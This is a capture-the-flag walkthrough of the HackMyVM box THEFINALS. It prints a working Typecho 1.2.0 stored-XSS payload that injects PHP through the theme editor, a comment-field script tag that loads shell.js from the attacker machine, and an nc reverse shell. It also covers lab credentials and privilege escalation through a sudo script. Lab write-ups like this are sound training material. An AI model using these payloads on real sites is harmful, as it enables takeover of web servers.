HackMyVM-THEFINALS

A box built by a skilled member of our group chat. There are already detailed tutorials online on setting up the VM and linking it with VirtualBox, so I will not repeat them here. Just one point: make sure the target environment has fully booted before starting the preliminary work (a lesson learned the hard way). That said, the boxes our group members build are very friendly: the IP is given directly, so there is no need to bother with an arp-scan.

Information gathering


Target IP: 192.168.56.105

nmap:

nmap -T4 -A -v 192.168.56.105
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-28 11:11 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:11
Completed NSE at 11:11, 0.00s elapsed
Initiating NSE at 11:11
Completed NSE at 11:11, 0.00s elapsed
Initiating NSE at 11:11
Completed NSE at 11:11, 0.00s elapsed
Initiating ARP Ping Scan at 11:11
Scanning 192.168.56.105 [1 port]
Completed ARP Ping Scan at 11:11, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:11
Completed Parallel DNS resolution of 1 host. at 11:11, 0.03s elapsed
Initiating SYN Stealth Scan at 11:11
Scanning 192.168.56.105 [1000 ports]
Discovered open port 22/tcp on 192.168.56.105
Discovered open port 80/tcp on 192.168.56.105
Completed SYN Stealth Scan at 11:11, 0.10s elapsed (1000 total ports)
Initiating Service scan at 11:11
Scanning 2 services on 192.168.56.105
Completed Service scan at 11:11, 6.08s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.105
NSE: Script scanning 192.168.56.105.
Initiating NSE at 11:11
Completed NSE at 11:11, 0.27s elapsed
Initiating NSE at 11:11
Completed NSE at 11:11, 0.01s elapsed
Initiating NSE at 11:11
Completed NSE at 11:11, 0.00s elapsed
Nmap scan report for 192.168.56.105
Host is up (0.00076s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.9 (protocol 2.0)
| ssh-hostkey:
| 256 42:a7:04:bb:da:b5:8e:71:7a:89:ff:a4:60:cd:4d:29 (ECDSA)
|_ 256 37:32:71:ca:3f:11:41:b4:d7:90:1e:c9:7f:e8:bc:20 (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Unix))
|_http-title: THE FINALS
|_http-server-header: Apache/2.4.62 (Unix)
| http-methods:
| Supported Methods: GET POST OPTIONS HEAD TRACE
|_ Potentially risky methods: TRACE
MAC Address: 08:00:27:BD:74:14 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Uptime guess: 22.031 days (since Tue May 6 10:27:15 2025)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=265 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT ADDRESS
1 0.76 ms 192.168.56.105

NSE: Script Post-scanning.
Initiating NSE at 11:11
Completed NSE at 11:11, 0.00s elapsed
Initiating NSE at 11:11
Completed NSE at 11:11, 0.00s elapsed
Initiating NSE at 11:11
Completed NSE at 11:11, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.36 seconds
Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.286KB)

dirsearch:

Target: http://192.168.56.105/

[11:14:29] Starting:
[11:14:29] 301 - 311B - /js -> http://192.168.56.105/js/
[11:14:30] 403 - 277B - /.ht_wsr.txt
[11:14:30] 403 - 277B - /.htaccess.orig
[11:14:30] 403 - 277B - /.htaccess.bak1
[11:14:30] 403 - 277B - /.htaccess.sample
[11:14:30] 403 - 277B - /.htaccess.save
[11:14:30] 403 - 277B - /.htaccess_extra
[11:14:30] 403 - 277B - /.htaccess_orig
[11:14:30] 403 - 277B - /.htaccess_sc
[11:14:30] 403 - 277B - /.htaccessBAK
[11:14:30] 403 - 277B - /.htaccessOLD
[11:14:30] 403 - 277B - /.htaccessOLD2
[11:14:30] 403 - 277B - /.htm
[11:14:30] 403 - 277B - /.html
[11:14:30] 403 - 277B - /.htpasswd_test
[11:14:30] 403 - 277B - /.htpasswds
[11:14:30] 403 - 277B - /.httr-oauth
[11:14:37] 301 - 313B - /blog -> http://192.168.56.105/blog/
[11:14:37] 200 - 17KB - /blog/
[11:14:37] 200 - 820B - /cgi-bin/printenv
[11:14:37] 200 - 1KB - /cgi-bin/test-cgi
[11:14:38] 301 - 312B - /css -> http://192.168.56.105/css/
[11:14:40] 301 - 314B - /fonts -> http://192.168.56.105/fonts/
[11:14:41] 200 - 607B - /images/
[11:14:41] 301 - 315B - /images -> http://192.168.56.105/images/
[11:14:42] 200 - 695B - /js/
[11:14:47] 301 - 320B - /screenshots -> http://192.168.56.105/screenshots/
[11:14:52] 403 - 277B - /server-status/
[11:14:52] 403 - 277B - /server-status

Port 80 is open and the scan found quite a few reachable pages; I visited each one in the browser.

The images are just images, with no steganography or the like; the other two entries could not be accessed at all.

Visiting /images shows that it is the directory holding the images and nothing else. The Apache version is 2.4.62, which has no vulnerability we can use.

Then /screenshots, which finally gave some progress: the screenshots there show the name and version number of a blog framework.

Visiting /blog confirms that the site is built with the framework mentioned above; clearly we are meant to look for an exploit for it.

Getshell


Searching for Typecho 1.2.0 turns up exploits:

Typecho stored XSS vulnerability reproduction (stored XSS without interaction) - CSDN blog

Typecho 1.2 - 1.2.1-rc front-end comment stored XSS to RCE: reproduction, analysis, fix - JunBlog

// Define a function that appends an iframe element at the end of the page
function insertIframe() {
    // Get the current page path
    var urlWithoutDomain = window.location.pathname;
    // Check whether the page is the comment management page
    var hasManageComments = urlWithoutDomain.includes("manage-comments.php");
    var tSrc = '';
    if (hasManageComments) {
        // If so, rewrite the path to the theme file editor page
        tSrc = urlWithoutDomain.replace('manage-comments.php', 'theme-editor.php?theme=default&file=404.php');
    } else {
        // Otherwise use the theme file editor page address directly
        tSrc = '/admin/theme-editor.php?theme=default&file=404.php';
    }
    // Define the iframe attributes: id, src, width, height and the onload event
    var iframeAttributes = "<iframe id='theme_id' src='" + tSrc + "' width='0%' height='0%' onload='writeShell()'></iframe>";
    // Get the original page content
    var originalContent = document.body.innerHTML;
    // Append the iframe to the end of the page
    document.body.innerHTML = (originalContent + iframeAttributes);
}

// Global flag isSaved, initially false
var isSaved = false;

// Define a function that writes a PHP snippet into the iframe and saves it
function writeShell() {
    // Only if isSaved is still false
    if (!isSaved) {
        // Get the content textarea and the "save file" buttons inside the iframe
        var content = document.getElementById('theme_id').contentWindow.document.getElementById('content');
        var btns = document.getElementById('theme_id').contentWindow.document.getElementsByTagName('button');
        // Get the original template file content
        var oldData = content.value;
        // Prepend a phpinfo snippet to the original content
        content.value = ('<?php phpinfo(); ?>\n') + oldData;
        // Click the "save file" button
        btns[1].click();
        // Set isSaved to true, marking the write as done
        isSaved = true;
    }
}
// Call insertIframe to add the iframe and trigger the PHP write
insertIframe();
http://xxx.xxx.com/"></a><script/src=http://192.168.56.104:8000/shell.js></script><a/href="#
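As an added example (my own code, not from the writeup or from Typecho), here is the defensive side of this bug: a check on the comment URL field that rejects the attribute-breakout shape of the payload above, output escaping so such a value can never be echoed as live markup, and a scan over stored comments to find rows that already carry one. Function names and the sample comment rows are my own constructions.

```python
import html
from urllib.parse import urlsplit

# Constructed sample comment records (cid, url field). The last one mirrors
# the shape of the stored-XSS payload used against the Typecho comment form.
SAMPLE_COMMENTS = [
    (1, "http://example.com/"),
    (2, "https://blog.example.org/post?id=3#top"),
    (3, 'http://xxx.xxx.com/"></a><script/src=http://192.168.56.104:8000/shell.js></script><a/href="#'),
]

# Characters that never belong in an href value; when echoed unescaped they
# close the surrounding attribute or tag, which is exactly how the payload works.
BREAKOUT_CHARS = set('"\'<> \t\r\n')


def classify_comment_url(raw: str) -> dict:
    """Input-side check: accept only absolute http(s) URLs with no breakout characters."""
    if any(ch in BREAKOUT_CHARS for ch in raw):
        return {"ok": False, "reason": "breakout characters in url"}
    try:
        parts = urlsplit(raw)
    except ValueError:
        return {"ok": False, "reason": "unparseable url"}
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return {"ok": False, "reason": "not an absolute http(s) url"}
    return {"ok": True, "reason": "valid"}


def render_anchor(raw: str) -> str:
    """Output-side defence: escape for a double-quoted attribute even after validation."""
    href = raw if classify_comment_url(raw)["ok"] else "#"
    return f'<a href="{html.escape(href, quote=True)}" rel="nofollow">author</a>'


def find_suspicious_comments(rows) -> list:
    """Retroactive scan of stored comments: ids whose url field fails the check."""
    return [cid for cid, url in rows if not classify_comment_url(url)["ok"]]


if __name__ == "__main__":
    for cid, url in SAMPLE_COMMENTS:
        print(cid, classify_comment_url(url)["reason"], render_anchor(url))
    print("suspicious:", find_suspicious_comments(SAMPLE_COMMENTS))
```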

Open an article and post the comment; we can see that the file was written successfully.

Visiting the path from the exploit, /usr/blog/theme/default/404.php, shows that phpinfo executed.

Next comes the fun part, getting a shell: upload a POST one-liner webshell and connect with Behinder... well, it would not connect, no idea why, so a reverse shell it is.

But bash gave no response.

I changed the exploit to read /etc/passwd and check which shell the target uses: it is ash.

content.value = ('<?php exec("nc 192.168.56.104 9000 -e /bin/ash"); ?>\n') + oldData;

Check the local usernames.

The home directory of user june is readable by any user; cd into it to get the user flag.

user:flag{4b5d61daf3e2e5ba57019f617012ad0919c2a6c29e11912aeadef2820be8f298}

Privilege escalation


Back in the directory where we first got the shell, I ran find to look for files usable for privilege escalation. There were none, but the directory contains a config.php holding the MySQL user configuration, so the idea was to log in to MySQL and pull information from the database.

It gives the user, password and database, and the DB privileges are already set up, so just log in.

mysql -u typecho_u -pQLTkbviW71CSRZtGWIQ

Logging in to MySQL from the blind shell obtained with nc kept lagging on output; the tables only showed up on exit. Annoyed, I went back and logged in again with a pty.

pty is a Python library that simulates a terminal login. In penetration testing it is commonly used to upgrade a blind shell, fooling commands into believing they are running in a proper terminal.

OK, we have the hash of the staff user from above; fire up hashcat.

Nothing.

Back to the shell then. The earlier find by permissions gave no results, so this time let's see whether any of the users owns files we can use.

Searching for files owned by user scotty turned up a log file.

find / -user scotty 2>/dev/null
/var/log/scotty-main.log

The log is full of broadcast messages sent to 192.168.11.255.

Listening locally on port 1337 with nc yields a string whose meaning is unclear, but it is clearly encoded.

Running CyberChef's Magic on it reveals that it is the user's private key file; combined with the earlier information, we can SSH in as scotty.
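As an added example from the responder's side (my own code, not part of the writeup), here is the CyberChef Magic step as a small script: it peels nested hex/base64 layers off a captured string and stops as soon as a private-key header appears, which is how one can check whether something seen on the wire is leaked key material. The captured sample is constructed (a placeholder body, not a real key) and the nesting order (hex, then base64) is my assumption; the writeup does not state the box's actual encoding.

```python
import base64
import binascii
import re

KEY_HEADER = re.compile(rb"-----BEGIN [A-Z ]*PRIVATE KEY-----")
HEX_ONLY = re.compile(rb"[0-9a-fA-F]+")

# Constructed sample: a placeholder key body (not a real key), hex-encoded and
# then base64-encoded, standing in for the string captured on port 1337.
FAKE_KEY = (b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
            b"Q09OU1RSVUNURUQtUExBQ0VIT0xERVItTk9ULUEtUkVBTC1LRVk=\n"
            b"-----END OPENSSH PRIVATE KEY-----\n")
CAPTURED = base64.b64encode(binascii.hexlify(FAKE_KEY))


def try_decode(data: bytes):
    """Return (layer_name, decoded) for the first encoding that applies, else None.
    Hex is tried before base64 because every hex string is also valid base64."""
    if HEX_ONLY.fullmatch(data) and len(data) % 2 == 0:
        return "hex", binascii.unhexlify(data)
    try:
        return "base64", base64.b64decode(data, validate=True)
    except (binascii.Error, ValueError):
        return None


def peel_for_private_key(blob: bytes, max_depth: int = 5):
    """Strip up to max_depth encoding layers; return (layers, plaintext) when a
    private-key header shows up, or (layers, None) if none was found."""
    layers, current = [], blob.strip()
    for _ in range(max_depth):
        if KEY_HEADER.search(current):
            return layers, current
        step = try_decode(current)
        if step is None or not step[1]:
            break
        layers.append(step[0])
        current = step[1].strip()
    return layers, (current if KEY_HEADER.search(current) else None)


if __name__ == "__main__":
    layers, key = peel_for_private_key(CAPTURED)
    print("layers peeled:", layers)
    print("private key found" if key else "no key material")
```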


Root


Let's see what privileges this user has.

thefinals:~$ sudo -l
Matching Defaults entries for scotty on thefinals:
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for scotty:
Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User scotty may run the following commands on thefinals:
(ALL) NOPASSWD: /sbin/secret

OK, there is only one NOPASSWD entry, so let's use it.

thefinals:~$ sudo /sbin/secret
/sbin/secret: line 2: can't create /dev/pts/99: Permission denied

Uh, you want me to get all the way to the 99th pty? That takes some quick fingers.

Write a script:

for i in $(seq 1 90); do python -c 'import pty; pty.spawn("/bin/ash")' & done

Then run it again:

~ $ sudo /sbin/secret
root:p8RuoQGTtlKLAjuF1Tpy5wX

Finally the root password; SSH in with it... nope.

Turns out it is the MySQL password.

With the root account we can access the secret database and get the real root password from the user table.

Database changed
MariaDB [typecho_db]> use secret;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [secret]> show tables;
+------------------+
| Tables_in_secret |
+------------------+
| user |
+------------------+
1 row in set (0.000 sec)

MariaDB [secret]> select * from user;
+----+----------+-------------------------+
| id | username | password |
+----+----------+-------------------------+
| 1 | root | BvIpFDyB4kNbkyqJGwMzLcK |
+----+----------+-------------------------+
1 row in set (0.000 sec)

thefinals:~# cat root.flag 
_____ __ __ ______
/\ __\ /\ "-.\ \ /\ ___\
\ \ \___ \ \ \-. \ \ \___ \
\ \____\ \ \_\\"\_\ \ \_____\
\/____/ \/_/ \/_/ \/_____/

flag{8c5daa407626d218e962041dd8fd8f37913e56e32a6f06725da403175be0b9ff}

thefinals:~# cat note.txt
ssh://root@thefinals.hmv:BvIpFDyB4kNbkyqJGwMzLcK
ssh://staff@thefinals.hmv:qDCsBTj30cQyityMh3Rnyys
ssh://june@thefinals.hmv:aYTmcORsUrmwaKa7C2DBLCh
ssh://scotty@thefinals.hmv:uuUoqAETern4v5tW2iMFs47

mariadb://root@localhost:p8RuoQGTtlKLAjuF1Tpy5wX

mariadb://typecho_u@typecho_db@localhost:QLTkbviW71CSRZtGWIQdB6s

typecho://staff@thefinals.hmv:n3nPbqEOhs6eTcchyqXTXWi
typecho://june@thefinals.hmv:DihPQiQqNO75vv8zNBzLwUm

flag{4b5d61daf3e2e5ba57019f617012ad0919c2a6c29e11912aeadef2820be8f298}
canyoureachthefinals -> sha256

flag{8c5daa407626d218e962041dd8fd8f37913e56e32a6f06725da403175be0b9ff}
youfinallyreachedthefinals -> sha256

THE FINALS is a great FPS game. A lot of inspiration comes from games. Try it on http://reachthefinals.com/

This box was quite fun. I have never fully understood XSS vulnerabilities, and this was a good chance to review them.

Here I am not sure whether that XSS exploit can only be used for a reverse shell. At the time I wanted to write a one-liner webshell and connect with AntSword or Behinder, but it never connected. The blog post above does reproduce RCE via POST, so maybe the box has some restriction or something.

Later I read LingMJ's writeup and found that he did use AntSword with a POST webshell, just with a different connection password, so it probably was not the box; more likely something was off with the way I wrote the shell.


HackMyVM-THEFINALS
http://example.com/2025/05/28/HackMyVM-THEFINALS/
Author: Skyarrow
Posted on: May 28, 2025